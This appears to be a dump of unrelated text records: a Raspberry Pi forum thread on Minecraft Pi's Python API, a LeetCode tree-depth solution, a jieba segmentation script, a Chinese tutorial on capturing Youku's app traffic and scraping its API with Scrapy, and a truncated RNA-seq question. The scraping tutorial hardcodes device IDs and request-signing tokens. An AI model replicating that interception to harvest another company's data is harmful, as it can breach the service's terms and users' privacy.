text
stringlengths 256
65.5k
|
|---|
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Hi, total Pi noob here.
Recently got a Pi B kit with an SD card already set up with Rasbian so my son can learn a little programming with Python. It's a great little bit of kit and we are really excited to set off on this path of learning. The resources available are great and so appreciated.
So far it's been good, teaching the basics of set up and running Rasbian and some Unix command line stuff. Today though we tried to do the first Minecraft lesson and were stumped right off the bat.
We were able to run and play Minecraft, obviously came pre installed on the card. Great. But when we got to run the first line of Python code in the lesson we got an error. After snooping around its obvious there is no mcpi folder in the home folder and I cannot find any instance of the Minecraft app.
So why, and how do I get it? Do I need to download a special programming version of MC? I am not set up with network access on the Pi yet. Without it I guess I'm out of luck at this point?
Thanks for any advice
AdamM
Recently got a Pi B kit with an SD card already set up with Rasbian so my son can learn a little programming with Python. It's a great little bit of kit and we are really excited to set off on this path of learning. The resources available are great and so appreciated.
So far it's been good, teaching the basics of set up and running Rasbian and some Unix command line stuff. Today though we tried to do the first Minecraft lesson and were stumped right off the bat.
We were able to run and play Minecraft, obviously came pre installed on the card. Great. But when we got to run the first line of Python code in the lesson we got an error. After snooping around its obvious there is no mcpi folder in the home folder and I cannot find any instance of the Minecraft app.
So why, and how do I get it? Do I need to download a special programming version of MC? I am not set up with network access on the Pi yet. Without it I guess I'm out of luck at this point?
Thanks for any advice
AdamM
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
I think you might be following an outdated tutorial.
Try this one: https://www.raspberrypi.org/learning/ge ... ecraft-pi/
(There will not be an mcpi folder in your home directory unless you choose to create one. If you are able to run and interact with MineCraft then it is clearly installed.)
Try this one: https://www.raspberrypi.org/learning/ge ... ecraft-pi/
(There will not be an mcpi folder in your home directory unless you choose to create one. If you are able to run and interact with MineCraft then it is clearly installed.)
DougieLawson
Posts:40533
Joined:Sun Jun 16, 2013 11:19 pm
Location:A small cave in deepest darkest Basingstoke, UK
Contact:Website Twitter
Take a look at the Xmas edition of
http://www.themagpi.com/issue/issue-se1/
The MagPi Magazinethere's six pages on getting Minecraft running on the Pi (and it was updated for the "pre-installed" version before that edition of the mag was published).
http://www.themagpi.com/issue/issue-se1/
Any language using left-hand whitespace for syntax is ridiculous
Any DMs sent on Twitter will be answered next month.
Fake doctors - are all on my foes list.
Any requirement to use a crystal ball or mind reading will result in me ignoring your question.
Any DMs sent on Twitter will be answered next month.
Fake doctors - are all on my foes list.
Any requirement to use a crystal ball or mind reading will result in me ignoring your question.
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
B.Goode wrote:I think you might be following an outdated tutorial.
Try this one: https://www.raspberrypi.org/learning/ge ... ecraft-pi/
(There will not be an mcpi folder in your home directory unless you choose to create one. If you are able to run and interact with MineCraft then it is clearly installed.)
Thanks for the reply. That is exactly the tutorial I was following. I entered the first line of code and got an error. I'm not near the Pi now so I can't check the exact verbiage of the error. I did some reading trying to find a solution and came across the 'stuffaboutcode' website. There I read that there should be an mcpi folder and I needed to copy some files from it.
Now I'm really stumped
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Are you referring to this Python code?If so, 'mcpi' is a Python library, not a folder in your home directory. I just tried that first line in Python 2.7.3 interactively on my R-Pi and it worked, even though there is no folder by that name in my home directory. If that first line gives you an error, you don't have the correct Python Minecraft library, meaning you do not have a current updated version of Raspbian (mine is a fresh, current install). However for me the second line failed, because I did not have Minecraft actually running on the Pi ("connection refused"). I tried it again when I had a Minecraft game running, and all three lines worked (and "Hello world" appeared in front of the player.)
Code: Select all
from mcpi import minecraft
mc = minecraft.Minecraft.create()
mc.postToChat("Hello world")
Code: Select all
pi@rp22 ~ $ python
Python 2.7.3 (default, Mar 18 2014, 05:13:23)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from mcpi import minecraft
>>> mc = minecraft.Minecraft.create()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/dist-packages/mcpi/minecraft.py", line 171, in create
return Minecraft(Connection(address, port))
File "/usr/lib/python2.7/dist-packages/mcpi/connection.py", line 17, in __init__
self.socket.connect((address, port))
File "/usr/lib/python2.7/socket.py", line 224, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused
Sorry I didn't fully read your post. Yes, you want network access in order to update your install to the current version (sudo apt-get update ; sudo apt-get upgrade )AdamMercado wrote:Recently got a Pi B kit with an SD card already set up with Rasbian [...] I am not set up with network access on the Pi yet. Without it I guess I'm out of luck at this point?
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Thanks DougieDougieLawson wrote:Take a look at the Xmas edition ofThe MagPi Magazinethere's six pages on getting Minecraft running on the Pi (and it was updated for the "pre-installed" version before that edition of the mag was published).
http://www.themagpi.com/issue/issue-se1/
Another fantastic learning resource for the Pi. Amazing. I will read through it and see how far I get
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Great reply. Thanks for the details. Yes that's exactly what I was entering into IDLE 3. I read somewhere else that the Minecraft API needed to be copied into the mcpi and I assumed that it was a directory. Makes sense now.jbeale wrote:Are you referring to this Python code?refused"). I tried it again when I had a Minecraft game running, and all three lines worked (and "Hello world" appeared in front of the player.)
Code: Select all
from mcpi import minecraft
mc = minecraft.Minecraft.create()
mc.postToChat("Hello world")
I noticed you were using a shell. I will try that.
Thx so much
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Okay, still no luck and started to really ticked off. This is supposed to be easy for teachers and kids. I've followed numerous basic beginner lessons over the past two weeks and none of them yield anything close to the correct result.
I am not an idiot, I know it's not me. I've used computers for almost 30 years. While not a programmer, I know my way around the command line and how to self teach. I repeat, I'm not an idiot. This should be easier.
None of the advice in previous replies above works. None. I've followed it to the character. If I can't get past step one then this whole idea is a complete waste of time.
Please look at the screen images I posted to see exactly what I'm typing and the error messages I get. There is still no mcpi folder and there absolutely unequivocally should be.
Can someone please please please offer some advice that will get me on my way.
https://www.dropbox.com/s/fte94ot53c9ro ... l.jpg?dl=0
https://www.dropbox.com/s/eruhmxb1qpufv ... n.jpg?dl=0
https://www.dropbox.com/s/ax02gn4mpl8vh ... n.jpg?dl=0
Thanks
Adam
I am not an idiot, I know it's not me. I've used computers for almost 30 years. While not a programmer, I know my way around the command line and how to self teach. I repeat, I'm not an idiot. This should be easier.
None of the advice in previous replies above works. None. I've followed it to the character. If I can't get past step one then this whole idea is a complete waste of time.
Please look at the screen images I posted to see exactly what I'm typing and the error messages I get. There is still no mcpi folder and there absolutely unequivocally should be.
Can someone please please please offer some advice that will get me on my way.
https://www.dropbox.com/s/fte94ot53c9ro ... l.jpg?dl=0
https://www.dropbox.com/s/eruhmxb1qpufv ... n.jpg?dl=0
https://www.dropbox.com/s/ax02gn4mpl8vh ... n.jpg?dl=0
Thanks
Adam
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
> There is still no mcpi folder and there absolutely unequivocally should be.
Was my earlier post useful? viewtopic.php?f=91&t=115897#p790874
There is no "mcpi" folder in the home directory
https://www.raspberrypi.org/learning/ge ... worksheet/ does work for me as expected. If it is not working for you then there must be some other cause for the problem.
Your second screenshot shows a Python error that "no module named mcpi" (note- "module" not "folder"). That means the Python module "mcpi" is not installed. To fix this, you can update your Raspbian install to the current version. You can do that withassuming the Pi is connected to the internet. I don't know how to fix it without having the Pi connected to the internet, except by moving it somewhere that you can connect.
If you believe you have a fully updated version, please report the result of typing at the shell prompt:
Was my earlier post useful? viewtopic.php?f=91&t=115897#p790874
There is no "mcpi" folder in the home directory
/home/pi/on my RPi 2 with current Raspbian installed, but despite that fact, this tutorial
https://www.raspberrypi.org/learning/ge ... worksheet/ does work for me as expected. If it is not working for you then there must be some other cause for the problem.
Your second screenshot shows a Python error that "no module named mcpi" (note- "module" not "folder"). That means the Python module "mcpi" is not installed. To fix this, you can update your Raspbian install to the current version. You can do that with
Code: Select all
sudo apt-get update
sudo apt-get upgrade
If you believe you have a fully updated version, please report the result of typing at the shell prompt:
Code: Select all
uname -a
With apologies for having referred you to the Raspberry Pi Foundation tutorial which I assumed would be reliable, I think there might be a small - but significant - error therein.
It clearly instructs you to use the Python3 entry, which runs the IDLE3 IDE for you, which relies on the python3.2.3 interpreter.
The installed python mcpi module requires to be accessed from python2. You can do this by using the Python entry, which runs the IDLE IDE instead.
On the assumption that this is an error in documentation I have raised it as an Issue with the maintainers of the documentation. https://github.com/raspberrypilearning/ ... /issues/14
It clearly instructs you to use the Python3 entry, which runs the IDLE3 IDE for you, which relies on the python3.2.3 interpreter.
The installed python mcpi module requires to be accessed from python2. You can do this by using the Python entry, which runs the IDLE IDE instead.
On the assumption that this is an error in documentation I have raised it as an Issue with the maintainers of the documentation. https://github.com/raspberrypilearning/ ... /issues/14
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Thanks much folks for the replies. After a lot of headbanging and digging around the 'net I found out that in earlier versions of MC that did not come pre installed there was an mcpi folder where all the API files were located. It took forever to realize that things are much different I later versions that come pre installed.
And I found several different methods of initiating the lesson (loading the classes, connecting to the server etc), which confused the issue even more.
Also, yes several tutorials I found stated Python 3 should be used, until I found one that mentioned using Python 2. I tried that and everything worked as expected.
There have been a few hiccups along the way. Some of the code in the Foundation lesson did not work for me (x, y, z position variables for instance) but I was able to workaround by declaring them individually. No worries.
So I was able to work thorough the lesson and then teach it to some 11 yr olds who loved it. Boning up on the next class. Just trying to stay a half step ahead.
So lesson learned, its confusing when things change and you are chasing outdated info. Would be really nice if those who wrote the lessons were able to update the post to mention this is no longer valid. Especially when they have gone to the trouble to write further lessons that are more current. Unfortunately Google is not yet smart enough to discern between the two. Anyhow that's neither here nor there and probably too much to wish for anyway.
Thanks again
Adam
And I found several different methods of initiating the lesson (loading the classes, connecting to the server etc), which confused the issue even more.
Also, yes several tutorials I found stated Python 3 should be used, until I found one that mentioned using Python 2. I tried that and everything worked as expected.
There have been a few hiccups along the way. Some of the code in the Foundation lesson did not work for me (x, y, z position variables for instance) but I was able to workaround by declaring them individually. No worries.
So I was able to work thorough the lesson and then teach it to some 11 yr olds who loved it. Boning up on the next class. Just trying to stay a half step ahead.
So lesson learned, its confusing when things change and you are chasing outdated info. Would be really nice if those who wrote the lessons were able to update the post to mention this is no longer valid. Especially when they have gone to the trouble to write further lessons that are more current. Unfortunately Google is not yet smart enough to discern between the two. Anyhow that's neither here nor there and probably too much to wish for anyway.
Thanks again
Adam
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
AdamMercado, you saved us with your research and careful explanations. Thanks very much. We too wasted hours attempting to follow online tutorials and a currently in-press Raspberry Pi book. I am concerned for the Raspberry Pi community; hopefully your post will make more people aware of the poor state of affairs for "getting started" documentation. [It seems from the lack of helpful responses to your original post that many RPi users are unaware of just how things are "disintegrating" w.r.t. clear documentation for new beginners. Seemingly there are MAJOR changes to what is installed in a kit, yet with no clear identification of this, or updating of, instructions.] Our problems went beyond just not being able to access the Minecraft API; they began with our kit's documentation not even matching what was on the pre-installed microSD card, so that we could not even follow the first several "getting started" steps. This appears to me to portend failure for the continued spread of this wonderful project platform. It appears that getting started with a new kit is already reaching the point of being "for existing Raspberry Pi experts only" or otherwise for very patient people willing to spend hours Googling and experimenting after discovering that most of their introductory instructions are wrong.
ben_nuttall
Posts:235
Joined:Sun Aug 19, 2012 11:19 am
Location:Cambridgeshire, UK
Contact:Website Twitter
We added Python 3 support a couple of months ago. Run
```bash
sudo apt-get update
sudo apt-get upgrade
```
from the Terminal and you'll have the Python 3 version too.
```bash
sudo apt-get update
sudo apt-get upgrade
```
from the Terminal and you'll have the Python 3 version too.
Former RPF staff. Author of gpiozero and creator of piwheels.
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Thank you for the reply. I'm glad my rant was in some small way a little help. I wish I was able to help more, I'm such a beginner too as I stumble my way through learning this platform.mbearden wrote:AdamMercado, you saved us with your research and careful explanations. Thanks very much.
It is a shame, but somewhat understandable considering the state of flux something as new and developing as this area of computing. In which case I think it needs special attention, by those reporting or developing resources for, to keep the flow of information in the right direction. Outdated info helps no one in the end. Inconsistent advice will only put off new arrivals to the game.
I wish you the best of luck as you push forward with your learning. I must say once I got over the initial set of frustrations, I have been enjoying playing around with it. My students even completed their first game programmed in minecraft last week, an exercise from the stuffaboutcode site. Very satisfying to see progress as last. I hope we can continue in this manner.
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
I'll stop short of saying this isn't true, you may very well have added support for Python 3. However the lessons that call for Python 3 to be used do not work for me, and I have to resort to using Python 2. This is a confusing source of confusion that needs to be straightened out I feel.ben_nuttall wrote:We added Python 3 support a couple of months ago. Run
```bash
sudo apt-get update
sudo apt-get upgrade
```
from the Terminal and you'll have the Python 3 version too.
I have already run the update/upgrade process to no avail. In fact, checking in the GUI package update manager (sorry I cannot recall its name presently, I'm still learning all the nomenclature) it shows minecraft as having an update available, but whenever I try to manually update those packages it fails.
Thanks
Raspberry Pi 2 B, Rasbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Oh Adam,
I wish I had read this before spending 3hrs going through the same woes
I have the exact same issue, I've updated my PI with the latest updates and tried to running through this: https://www.raspberrypi.org/learning/ge ... worksheet/
And it fails saying there's no module named mcpi.minecraft
I spent ages trying to sort this out and remembered and found this thread and remembered I followed a Minecraft whack a mole set of instructions and that also failed, then out of luck I tried to run the Whack a mole using Python 2 and it was fine.
So... there's something wrong here: https://www.raspberrypi.org/learning/ge ... worksheet/ if we've both had the same issue
Can anyone provide a fix to this as it would be great to follow the Python 3 based examples on this site
TIA
I wish I had read this before spending 3hrs going through the same woes
I have the exact same issue, I've updated my PI with the latest updates and tried to running through this: https://www.raspberrypi.org/learning/ge ... worksheet/
And it fails saying there's no module named mcpi.minecraft
I spent ages trying to sort this out and remembered and found this thread and remembered I followed a Minecraft whack a mole set of instructions and that also failed, then out of luck I tried to run the Whack a mole using Python 2 and it was fine.
So... there's something wrong here: https://www.raspberrypi.org/learning/ge ... worksheet/ if we've both had the same issue
Can anyone provide a fix to this as it would be great to follow the Python 3 based examples on this site
TIA
Also... I'd just like to say... I think the PI is amazing
My 7yr old Son loves Scratch and I'm wanting him to get into Python now and then go further by adding extra goodies to the PI
So for all involved in PI and its support (you guys on here) you have my upmost thanks !!
My 7yr old Son loves Scratch and I'm wanting him to get into Python now and then go further by adding extra goodies to the PI
So for all involved in PI and its support (you guys on here) you have my upmost thanks !!
So after a bit more reading its clear that Minecraft PI does not work with Python 3 but some (including Ben) have looked to port Minecraft PI to Python 3 as you can see here: https://github.com/py3minepi/py3minepi
So for me one of two things should happen really to clear this up:
Either
This https://www.raspberrypi.org/learning/ge ... worksheet/ needs updating (or regressing) to show Python 2 commands not 3
Or
This https://www.raspberrypi.org/learning/ge ... worksheet/ needs updating to say you need to download this https://github.com/py3minepi/py3minepi but bear in mind its still WIP
This would save people a lot of frustration
Thanks
So for me one of two things should happen really to clear this up:
Either
This https://www.raspberrypi.org/learning/ge ... worksheet/ needs updating (or regressing) to show Python 2 commands not 3
Or
This https://www.raspberrypi.org/learning/ge ... worksheet/ needs updating to say you need to download this https://github.com/py3minepi/py3minepi but bear in mind its still WIP
This would save people a lot of frustration
Thanks
If you have the latest version of Raspbian, the Minecraft Pi API python library (mcpi) is Python 3 compatible.
Its important to keep software on the Pi up to date.
Its important to keep software on the Pi up to date.
"am I getting slower, or is stuff more complicated; either way I now have to write it down - stuffaboutcode.com"
Thanks LetHopeItsSnowing I can confirm I did this:
https://www.raspberrypi.org/documentati ... pdating.md
Yesterday and restarted the PI before starting on using Minecraft PI with Python 3 and had the same issues Adam had
Is there anything else I should be checking specifically?
TIA
https://www.raspberrypi.org/documentati ... pdating.md
Yesterday and restarted the PI before starting on using Minecraft PI with Python 3 and had the same issues Adam had
Is there anything else I should be checking specifically?
TIA
Minecraft Pi on Rasbian Jessi has no longer the "mcpi folder". Instead, the installation can be found in "/opt/minecraft-pi".
Python 3 works properly with the Minecraft installation. The problem is that most of the Python examples are old and based on
1. the "mcpi-folder" installation, which needs another import statement
2 the Python scripts are Python 2
And because I plan to use the recent installation for a Python course in school, I started a blog where I try to update all the information related to Python coding and Minecraft Pi.
The blog is not ready but I'm working on it continuously.
http://python-with-minecraft.goprogramming.space/
Python 3 works properly with the Minecraft installation. The problem is that most of the Python examples are old and based on
1. the "mcpi-folder" installation, which needs another import statement
2 the Python scripts are Python 2
And because I plan to use the recent installation for a Python course in school, I started a blog where I try to update all the information related to Python coding and Minecraft Pi.
The blog is not ready but I'm working on it continuously.
http://python-with-minecraft.goprogramming.space/
Thanks greendogs
I understand what you are saying but the instructions here: https://www.raspberrypi.org/learning/ge ... worksheet/
And on your site state to use this command:
Which is where it fails for me using Python 3
Even if I type that directly into the Shell it fails saying it cannot find the module mcpi.minecraft
So if you are saying that works fine for you, I must be different? And I'm trying to understand where I should be looking for those differences
I understand what you are saying but the instructions here: https://www.raspberrypi.org/learning/ge ... worksheet/
And on your site state to use this command:
Code: Select all
from mcpi.minecraft import Minecraft
Even if I type that directly into the Shell it fails saying it cannot find the module mcpi.minecraft
So if you are saying that works fine for you, I must be different? And I'm trying to understand where I should be looking for those differences
DougieLawson
Posts:40533
Joined:Sun Jun 16, 2013 11:19 pm
Location:A small cave in deepest darkest Basingstoke, UK
Contact:Website Twitter
sudo apt-get install python{,3}-minecraftpi
Any language using left-hand whitespace for syntax is ridiculous
Any DMs sent on Twitter will be answered next month.
Fake doctors - are all on my foes list.
Any requirement to use a crystal ball or mind reading will result in me ignoring your question.
Any DMs sent on Twitter will be answered next month.
Fake doctors - are all on my foes list.
Any requirement to use a crystal ball or mind reading will result in me ignoring your question.
|
Description
Given a binary tree, find its maximum depth.
The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.
Note: A leaf is a node with no children.
Example:
Given binary tree [3,9,20,null,null,15,7],
3 / \ 9 20 / \ 15 7
return its depth = 3.Accepted
Explanation
List all scenarios of what a binary tree could be like:
when a binary tree is null, simply return maximum depth as 0
when a binary tree just have a root node, return maximum depth as 1
when a binary tree has a root node and child nodes, maximum depth would be the depth of the bigger side between left and right subtrees plus 1.
Java Solution
/** * Definition for a binary tree node. * public class TreeNode { * int val; * TreeNode left; * TreeNode right; * TreeNode(int x) { val = x; } * } */ class Solution { public int maxDepth(TreeNode root) { if (root == null) { return 0; } int leftDepth = maxDepth(root.left); int rightDepth = maxDepth(root.right); return Math.max(leftDepth, rightDepth) + 1; } }
Python Solution
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def maxDepth(self, root: TreeNode) -> int:
if root == None:
return 0
left = self.maxDepth(root.left)
right = self.maxDepth(root.right)
max_depth = max(left, right) + 1
return max_depth
|
具体代码如下
# -*- encoding=utf-8 -*-
import jieba.analyse
import jieba
import pandas as pd
# 载入自定义词典
jieba.load_userdict('dict.txt')
# 载入自定义停止词
jieba.analyse.set_stop_words('stop_words.txt')
# 去掉中英文状态下的逗号、句号
def clearSen(comment):
comment = comment.strip()
comment = comment.replace('、', '')
comment = comment.replace(',', '。')
comment = comment.replace('《', '。')
comment = comment.replace('》', '。')
comment = comment.replace('~', '')
comment = comment.replace('…', '')
comment = comment.replace('\r', '')
comment = comment.replace('\t', ' ')
comment = comment.replace('\f', ' ')
comment = comment.replace('/', '')
comment = comment.replace('、', ' ')
comment = comment.replace('/', '')
comment = comment.replace('。', '')
comment = comment.replace('(', '')
comment = comment.replace(')', '')
comment = comment.replace('_', '')
comment = comment.replace('?', ' ')
comment = comment.replace('?', ' ')
comment = comment.replace('了', '')
comment = comment.replace('➕', '')
comment = comment.replace(':', '')
return comment
# 读取数据
# zhengce_content = pd.read_table('0020.txt', sep=',') # 后面有sep的讲解
zhengce_content = pd.read_table('./2016_wenben/0007.txt', sep='\t')
# 数据重命名
zhengce_content.columns = ['content']
# 文件写入
outputfile = open('2016_jieba_output.txt', 'a+', encoding="utf-8")
# 这个是分词后你要写入哪个文件,就填入哪个文件的地址,文件地址的写法,可以看我的文章
for each in zhengce_content['content']:
# 清除标点符号,使用了上面的函数
kk = clearSen(each)
# 精确模式切词
seg_list = jieba.cut(kk)
comment = " ".join(seg_list)
print(comment)
# 写出数据
outputfile.write(comment)
# 关闭文件
outputfile.close()
在此之前,你需要弄懂几个问题
1.结巴库,pandas库的下载安装
2.自定词典,停用词,需要处理的文件,处理后写入的文件,都需要是txt文件且为utf-8格式
3.文件的路径指定,可以参考我的这个文章https://blog.csdn.net/weixin_44301621/article/details/89513870
接下来是sep的讲解
输入以下代码时
print('123', 'abc','zhangsan')
# 输出结果 123 abc zhangsan
当输入以下代码时
print('123', 'abc','zhangsan',sep=',')
# 输出结果 123,abc,zhangsan
也就是说,sep是在指定分隔符,我们要以什么符号为分隔符。在最上面jieba分词中代码,sep指定的是,读取文件时,以什么符号为分割,来读取文件。
;
|
零、废话
挖掘数据无论是对运营还是产品,都是一项相当重要的技能,尤其是在大数据时代,有效数据越多,决策的正确率越高。获取自己网站的各类数据当然是不成问题的,但是想要获取到竞品的各种数据往往是要付出较高的代价,有时就算是同一家公司兄弟部门的产品,一旦你开口想要运营数据时,你就会发现兄弟部门一点都不兄弟!!!所以,求人不如求己,能动手就别吵吵!
一般想要获取竞品比较详尽的数据是需要通过第三方平台的,但是这些平台的数据也是很有限的,例如最近上线的易观千帆,提供了大量移动应用的各种统计数据,但是这些数据一般只适合作为行业分析,对于产品和运营来说,想要作为一个功能或一个模块的决策依据是远远不够的。这时候,如果能自己写个简单的爬虫,不当显得高端大气,而且也是比较可靠的,自己动手,丰俭由人。
一、动手前的准备
要做什么?
假设我现在是一名视频应用行业的运营,日常工作之一获取竞品每天在推荐位都上了些什么视频,以及这些视频的播放量。这些数据可以用来分析行业的流行趋势以及自家产品和竞品在数据上的关系。今天我们拿优酷开刀,抓取他们首页的视频以及视频的播放量。
需要哪些知识?
爬虫脚本语言:python,只要知道些基本的语法。
爬虫框架:Scrapy
抓包工具:Charles或Fiddler或其他。。。
基本的命令行操作知识
基本的http知识
二、进入数据世界的大门
我们的目标是什么?获取竞品的数据!
竞品的数据存在哪里?服务器里?
怎样获取别人服务器里的数据?黑了它们的服务器!
you can you up...
各个公司与互联网之间会有许多相互连接的桥梁,其中最主要也是最容易获取的应该就是API了。获取api的方式多种多样,例如你想要抓取数据的网站或应用没有公开API,但是很巧的你认识他们的开发者,这时候坑蒙拐骗可能是一种简单有效的方式,然而更普遍的方法是使用抓包工具。下面我们就以Charles演示怎么 获取到优酷ipad客户端的api。
Charles的使用并没有什么好说的,在设备上设置好代理就可以抓到设备的所有http请求了,万幸优酷并没有使用https协议,虽然并没有太大的差别。使用Filter筛选出所有youku的请求.
对host和path进行简单的分析揣测,可以很容易的猜出host为api.mobile.youku.com的就是优酷主要内容的api的host了。然后我们选中这个疑似优酷首页的请求,右键点击这个请求,然后点击edit选项,就可以很清晰的看出这个api的构成了。
首先这是一个get请求,api地址是http://api.mobile.youku.com/layout/ipad/home/adv,下面的这一块就是请求的参数了,参数名都是些很亲切的单词啊,有用户id和设备id之类的,这些具体代表什么并不重要,只要知道请求的时候把参数填正确就行了。最后两个参数s和t就比较麻烦了,t应该是时间戳,这个值在一定时间段内有效,s我还没猜出来具体是代表什么,应该是根据时间戳以及其他参数一起计算出来的一个字段,这两个值都是在一个时间段内有效的。接下来我们复制这个请求链接,粘贴到浏览器里,就可以看到那些美妙的数据啦!
这些看起来很乱的数据,它们是有格式的,也就是传说中的json格式。找个工具格式化一下,这些数据的结构就非常清晰了!
三、进入“大”数据时代
优酷首页的数据仔细看下应该就能看出来,这是首页每一个视频对应的基本信息,这些数据看起来量很大,然而并没有什么用,因为这些数据里面并没有包含视频对应的播放量等信息。于是我们很机智的在视频的详情页中看到了有播放量的显示,所以我们接下来就是要抓取视频详情页的数据。随便扫了一眼就看到了详情页的api,我怎么会这么聪明呢!!
Scrapy是一款基于python语言的爬虫框架,跨平台,功能强大,语言入门难度低。相对于没有基础的人来说是个还算不错的选择吧,顺利的完成中文教程中的这前三部分后,就可以愉快的抓取一些简单的数据啦
离开本文学习中。。。。。。
默默的写好了爬虫文件,对于这个例子,只需要一个简单的文件就行了,先上代码。PS:里面有部分参数做了修改,所以直接复制粘贴肯定是不能用的
###########引入必要的包
#用于设置文本格式,方便输出
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
#scrapy爬虫和json格式以及Request必要的包
import scrapy
import json
from scrapy.http import Request
###########爬虫主要代码
class DmozSpider(scrapy.Spider):
#声明接口和各种参数的变量,方便修改和调用
home_api="http://api.mobile.youku.com/layout/ipad/home/adv"
global detail_api,ouid,idfa,vdid,brand,os,ver,deviceid,guid,network,pid,os_ver,btype,_t_,_s_
detail_api="http://api.mobile.youku.com/layout/ipad4_0/play/detail"
ouid ="8fa2748394da5b97f6636c064faaf3f61ef3442c2"
idfa="9C333152-19FE-4703-B026-BBBD17B4D0E7"
vdid="CF555DE3-3A07-429A-97FA-5D2431AD6005"
brand="apple"
os="ios"
ver="4%2E7%2E1"
deviceid ="0f777264fc6318a92b9e13c65db7cd3c"
guid="7066707222dc38af1621eaf94a6fe779"
network="WIFI"
pid="87c959fb273378eb"
os_ver="10%2E0%2E2"
btype="iPad5,3"
_s_="fec9043f65a06935a2327497d868aa67"
_t_="1475939554"
#教程例子中有。。。
name = "dmoz"
allowed_domains = ["youku.com"]
start_urls = [
# 拼凑优酷首页的请求地址
home_api+"?"+"ouid="+ouid+"&idfa="+idfa+"&vdid="
+vdid+"&brand="+brand+"&os="+os+"&ver="+ver
+"&deviceid="+deviceid+"&guid="+guid+"&network="
+network+"&pid="+pid+"&os_ver="+os_ver+"&btype="+btype+"&_s_="+_s_+"&_t_="+_t_
]
def parse(self, response):
# 请求首页地址成功是的返回操作,下面两个参数是详情页对应的_s_和_t_,首页和详情页的这两个参数值是不一样的,这两个参数也只有几分钟的有效时间
d_s_="3f9ecdaf156976e1c43022ac115e22c7"
d_t_="1475939594"
#将首页请求到的数据转换为json格式,方便后续操作
js = json.loads(response.body_as_unicode())
#从返回的数据中取出key为“results”对应的值
vsresult=js['results']
#对上面获取到的值进行循环遍历,获取到里面所有的视频信息
for results in vsresult:
try:
vds=results["videos"]
for vd in vds:
#获取到视频的id,然后拼凑成视频详情页的请求链接
tid=vd['tid']
detailurl=detail_api+"?"+"id="+tid+"&ouid="+ouid+"&idfa="+idfa+"&vdid="+vdid+"&brand="+brand+"&os="+os+"&ver="+ver+"&deviceid="+deviceid+"&guid="+guid+"&network="+network+"&pid="+pid+"&os_ver="+os_ver+"&btype="+btype+"&_s_="+d_s_+"&_t_="+d_t_
#请求视频详情页地址,请求的返回结果调用parse_detail函数
yield Request(detailurl, callback=self.parse_detail)
except Exception as e:
continue
#请求视频详情页成功时调用的函数
def parse_detail(self,response):
#将返回的数据转换为json格式,并取出相应的值
js = json.loads(response.body_as_unicode())
res=js["detail"]
title=res["title"]
total_vv=res["total_vv"]
ret=title+" download: "+total_vv+"\n"
#将获取到的值写入data.txt文件中
f=file("data.txt","a+")
f.write(ret)
f.close()
这就是取得的最终结果,是不是看上去很简单?好吧,确实有些复杂,然而这只是最最基本的应用了,掌握了方法之后,爬虫可以办到非常多很有意思的事情哦!
|
I am trying to use a pipeline for RNA seq which has been used by one of my colleagues. I have got in total of 8 files. These files are 8 count files of RNA seq data. I am using less command
less wth1count.txtless wth2count.txtless wth3count.txtless wth4count.txtless 99h1count.txtless 99h2count.txtless 99h3count.txtless 99h4count.txt
and to count the number of lines for each of the 8 files the command that I use is
wc -l wth1count.txtwc -l wth2count.txtwc -l wth3count.txtwc -l wth4count.txtwc -l 99h1count.txtwc -l 99h2count.txtwc -l 99h3count.txtwc -l 99h4count.txt
My subsequent goal is to filter out reads that are lower than 5 and for that I am using python scripts
cat filtercounts.py
#!/usr/bin/python
#Load relevant modules
import sys
#Read in the HTseq gene count output files for each of the 8 samples
inputlist = [sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7], sys.argv[8]]
##Determine the genes with sufficient coverage
#Set up a variable to hold genes with sufficient coverage in any of the 8 samples
genelist = []
